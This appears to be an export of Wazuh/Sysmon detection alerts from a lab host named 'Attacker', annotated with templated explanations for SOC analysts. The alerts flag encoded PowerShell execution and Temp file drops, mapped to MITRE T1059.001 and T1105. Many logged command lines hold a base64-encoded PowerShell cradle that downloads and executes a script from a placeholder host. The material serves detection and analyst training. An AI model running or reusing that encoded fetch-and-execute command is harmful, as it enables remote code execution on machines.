data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bce8-680a-e30a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  14284
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:02.890+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:02.890+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  37
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534222.1185951
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:29.7188541Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282819
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:36:29.700 ProcessGuid: {94294ddc-bcec-680a-e50a-000000000e00} ProcessId: 1468 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_eamq14se.2pz.ps1 CreationUtcTime: 2025-04-24 22:36:29.700 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:29.700
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcec-680a-e50a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  1468
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_eamq14se.2pz.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:36:29.700
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:03.333+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:03.333+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  34
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534223.1188716
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:32.1375533Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282849
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:36:30.544 ProcessGuid: {94294ddc-bcee-680a-e70a-000000000e00} ProcessId: 11608 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bcec-680a-e50a-000000000e00} ParentProcessId: 1468 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:30.544
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcee-680a-e70a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  11608
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bcec-680a-e50a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  1468
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:03.350+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:03.350+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  38
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534223.1196783
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:32.3062006Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282850
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:36:32.285 ProcessGuid: {94294ddc-bcee-680a-e70a-000000000e00} ProcessId: 11608 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_ss5qtls3.nav.ps1 CreationUtcTime: 2025-04-24 22:36:32.285 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:32.285
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcee-680a-e70a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  11608
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_ss5qtls3.nav.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:36:32.285
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:04.043+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:04.043+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  35
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534224.1199552
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:34.8707334Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282895
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:36:33.276 ProcessGuid: {94294ddc-bcf1-680a-e90a-000000000e00} ProcessId: 9396 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bcee-680a-e70a-000000000e00} ParentProcessId: 11608 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:33.276
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcf1-680a-e90a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  9396
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

